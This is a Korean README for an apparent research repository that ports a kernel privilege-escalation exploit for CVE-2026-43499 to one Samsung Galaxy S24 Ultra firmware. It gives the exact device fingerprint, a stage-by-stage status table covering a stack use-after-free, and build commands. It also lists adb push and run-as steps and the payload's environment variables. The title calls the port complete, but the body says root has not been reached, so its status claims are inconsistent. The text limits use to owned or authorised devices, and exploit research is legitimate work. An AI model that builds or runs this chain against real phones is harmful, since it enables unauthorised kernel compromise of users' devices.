
Galaxy S24 Ultra SM-S928U1 DZF2용 CVE-2026-43499 연구 포트 (완료)
미국판 Samsung Galaxy S24 Ultra를 대상으로 한 CVE-2026-43499의 기기별 리서치 포트로, 펌웨어 S928USQS6DZF2(앱 도메인 / 프로덕션 경로)에서 동작합니다.
이 저장소는 CVE-2026-43499-S25U의 S24U 대응 버전입니다. 현재 미완성 진행 상황을 담고 있습니다. 제어 플레인과 잔여 스택 UAF 준비(arming)는 갖춰져 있지만, 깨끗한 게이트 쓰기(hits>0)는 아직 달성되지 않았습니다.
Model: SM-S928U1
Codename: e3q
Android: 14 / BP4A.251205.006 (display family)
Build / AP: S928U1UES6DZF2 / S928USQS6DZF2
Fingerprint: samsung/e3qsqw/e3q:14/UP1A.231005.007/S928USQS6DZF2:user/release-keys
Kernel: 6.1.145-android14-11-33419968-abS928USQS6DZF2
Architecture: arm64 / 4K pages
오프셋과 레이아웃은 이 펌웨어에만 적용됩니다. 증거 없이 빌드 간에 상수를 옮기지 마십시오.
| 단계 | 상태 |
|---|---|
| KernelSnitch mm 누수 / 페이지 준비 | 프로덕션에서 작동 |
| 뱅크 리클레임 + MSG_PEEK (owner=1) | 작동 |
| 클래식 EDEADLK 잔여 스택 UAF 준비(arm) | 작동 |
| 스택 심기(plant) (nfds ≤ 320, 잔여 베이스 시프트=2) | 작동 |
| 초기 종료(early-exit) 매치 @ prio 120 (139 아님) | 작동 |
| 초기 종료(early-exit) 상태에서의 소프트 쓰기 지오메트리 | 안전하게 심어짐; 워크 없음 |
REPLANT + walk_nice 강제 adjust_pi 워크 | 검증됨; 지금까지는 항상 KP |
게이트 오라클 hits>0 | 미해결 |
| 파이프 물리 읽기/쓰기(phys-rw) / Android 루트 / KernelSU | 도달하지 못함 |
차단 요소(Blocker): 워크 안전(walk-safe) 잔여 지오메트리. 진정한 RB_EMPTY 심기에는 잔여 커널 VA(APP_STAMP_RESIDUAL_ADDR / APP_STAMP_OVERLAY_BASE)가 필요합니다. 위조된 트리(forged trees)와 KEEP 오버레이는(FD_ZERO에서 0이 되는) 강제 워크 시 패닉을 일으킵니다. docs/PROGRESS.md를 참조하십시오.
agent/s928u-bp4a-251205-006(E3Q DZF2)에서 파생Apache License 2.0: LICENSE.
e3q-S928USQS6DZF2(물리 P0 오라클, 뱅크 레이아웃, DZF2용 파이프 지오메트리)slide_app.c가 포함된 앱 도메인 페이로드(cve-2026-43499-app.so): 잔여 스탬프 심기, soft_match, REPLANT 워크, walk_nice, NO_PLANT, EMPTY 심기 훅, 뱅크 피크(peek), 드레인 배선O_APPEND 로그 오픈이 포함된 루트 헬퍼(부모/자식 로그 덮어쓰기 방지)export ANDROID_NDK_HOME=/path/to/ndk # e.g. r28 / API 34 clang
make -j$(nproc)
# or:
make app API=34
산출물:
build/e3q-S928USQS6DZF2/cve-2026-43499-app.so
build/e3q-S928USQS6DZF2/cve-2026-43499-root
build/e3q-S928USQS6DZF2/cve-2026-43499 # optional standalone
시리얼 R5CXB20H9FD(예시 리서치 장치)에 대한 Windows ADB(또는 호스트 adb):
# Prefer the rebuilt helper (O_APPEND logs), not only the APK copy.
adb push build/e3q-S928USQS6DZF2/cve-2026-43499-app.so /data/local/tmp/
adb push build/e3q-S928USQS6DZF2/cve-2026-43499-root /data/local/tmp/
adb shell "run-as dev.busung.s25uroot sh -c '
mkdir -p files/payload-overrides/e3q-S928USQS6DZF2
cp /data/local/tmp/cve-2026-43499-app.so \
files/payload-overrides/e3q-S928USQS6DZF2/
cp /data/local/tmp/cve-2026-43499-root files/
chmod 700 files/cve-2026-43499-root \
files/payload-overrides/e3q-S928USQS6DZF2/cve-2026-43499-app.so
'"
export APP_STACK_UAF_STAMP=1
export APP_STAMP_PLANT=soft
export APP_STAMP_SOFT_MATCH=1
export APP_STAMP_FIXED_SHIFT=2
export APP_BANK_VALID_ROOT=1
export APP_STAMP_STATUS_PATH=/data/user/0/dev.busung.s25uroot/files/stamp_status_last.txt
# run via helper --run-payload ... (see docs/PROGRESS.md)
# After soft_match plant: change residual prio then force task nice change.
export APP_STAMP_REPLANT_WALK=1
export APP_STAMP_WALK_PRIO=100
export APP_STAMP_WALK_NICE=18 # must differ from first nice (default 19)
# Prefer EMPTY bank for some paths; still KP without residual kVA EMPTY plant
심기(plant) 시프트 0–4를 다시 스캔하지 마십시오. 베이스 2가 확정되어 있습니다.
| 문서 | 내용 |
|---|---|
| docs/PROGRESS.md | 마일스톤 매트릭스, OBS/SRC 주장, 중단 지점 |
| docs/ENV_REFERENCE.md | 스탬프/뱅크 경로용 환경 변수 |
소유한 기기 또는 명시적으로 테스트가 허가된 기기에서만 사용하십시오. 이 트리는 잠긴 프로덕션 폰 경로를 위한 리서치 소프트웨어이며, 완성된 루트 또는 KernelSU 설치 프로그램이 아닙니다.
KernelSU 통합은 신뢰할 수 있는 파이프/물리 쓰기 및 루트 경로가 존재할 때까지 범위 밖(out of scope)입니다. 이 저장소를 KSU 준비 완료(KSU-ready)로 취급하지 마십시오.
| docs/RUN_HISTORY.md | 간추린 기기 실행 기록(RUN047–062) |